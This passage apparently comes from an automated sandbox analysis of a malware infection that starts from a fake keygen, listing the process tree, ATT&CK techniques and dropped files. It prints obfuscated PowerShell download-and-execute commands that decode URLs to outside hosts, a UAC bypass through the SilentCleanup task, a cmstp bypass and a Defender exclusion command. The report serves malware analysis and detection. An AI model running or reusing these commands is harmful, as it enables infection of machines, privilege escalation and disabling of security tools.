                      • Suspicious use of AdjustPrivilegeToken
                      PID:604
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2600
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2248
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1388
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 1388 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\025675399683053\\* & exit
                      9⤵
                        PID:476
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 1388
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3032
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3052
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:960
                • C:\Users\Public\lks.exe
                  "C:\Users\Public\lks.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2776
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1904
              • C:\Users\Public\ofq.exe
                "C:\Users\Public\ofq.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1892
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2384
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2384 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\316131862347936\\* & exit
                      8⤵
                        PID:1312
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2384
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1440
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:1132
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2344
                  • C:\Users\Public\ofq.exe
                    "C:\Users\Public\ofq.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2304
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1580
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\ba.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1444
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1056
                • C:\Users\Public\mwu.exe
                  "C:\Users\Public\mwu.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2516
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2560
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2712
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2712 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\417960329582405\\* & exit
                        8⤵
                          PID:872
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2712
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2580
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2588
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2668
                    • C:\Users\Public\mwu.exe
                      "C:\Users\Public\mwu.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2620
                      • C:\Users\Admin\AppData\Local\Temp\RWvwkt4erD.exe
                        "C:\Users\Admin\AppData\Local\Temp\RWvwkt4erD.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1772
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\RWvwkt4erD.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2644
                      • C:\Users\Admin\AppData\Local\Temp\fc5LSbhTL7.exe
                        "C:\Users\Admin\AppData\Local\Temp\fc5LSbhTL7.exe"
                        7⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:1020
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:2796
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c C:\Users\Public\Natso.bat
                              9⤵
                                PID:2648
                                • C:\Windows\SysWOW64\reg.exe
                                  reg delete hkcu\Environment /v windir /f
                                  10⤵
                                  • Modifies registry key
                                  PID:1672
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                  10⤵
                                  • Modifies registry key
                                  PID:1272
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                  10⤵
                                    PID:2008
                              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                8⤵
                                  PID:1548
                              • C:\Users\Admin\AppData\Local\Temp\FNaf08aE0o.exe
                                "C:\Users\Admin\AppData\Local\Temp\FNaf08aE0o.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:2664
                                • \??\c:\windows\SysWOW64\cmstp.exe
                                  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ibl4g3oj.inf
                                  8⤵
                                    PID:2304
                                • C:\Users\Admin\AppData\Local\Temp\NRBoiuod8s.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NRBoiuod8s.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Windows security modification
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3004
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" Get-MpPreference -verbose
                                    8⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2908
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mwu.exe"
                                  7⤵
                                    PID:1292
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:2328
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D24D.tmp\ba1.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:1084
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1552

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      6
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Install Root Certificate

                      1
                      T1130

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\MSVCP140.dll
                      • C:\ProgramData\VCRUNTIME140.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11c37b61-ebf6-40cb-b44f-a4c9f770f6fe
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79d5a264-56d2-42ad-bdc8-57a1d1d9fa92
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ed2f9f22-1146-49a1-8c48-f74cc0b8f807
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f9201763-6446-42c2-a12c-602f98adfc19
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\D24D.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\FNaf08aE0o.exe
                      • C:\Users\Admin\AppData\Local\Temp\FNaf08aE0o.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NRBoiuod8s.exe
                      • C:\Users\Admin\AppData\Local\Temp\NRBoiuod8s.exe
                      • C:\Users\Admin\AppData\Local\Temp\RWvwkt4erD.exe
                      • C:\Users\Admin\AppData\Local\Temp\RWvwkt4erD.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\fc5LSbhTL7.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\fc5LSbhTL7.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Public\Natso.bat
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\lks.exe
                      • C:\Users\Public\mwu.exe
                      • C:\Users\Public\mwu.exe
                      • C:\Users\Public\mwu.exe
                      • C:\Users\Public\ofq.exe
                      • C:\Users\Public\ofq.exe
                      • C:\Users\Public\ofq.exe
                      • C:\Users\Public\ofq.exe
                      • C:\Users\Public\ofq.exe
                      • C:\Windows\temp\ibl4g3oj.inf
                      • \??\PIPE\srvsvc
                      • \??\PIPE\srvsvc
                      • \??\PIPE\srvsvc
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\msvcp140.dll
                      • \ProgramData\msvcp140.dll
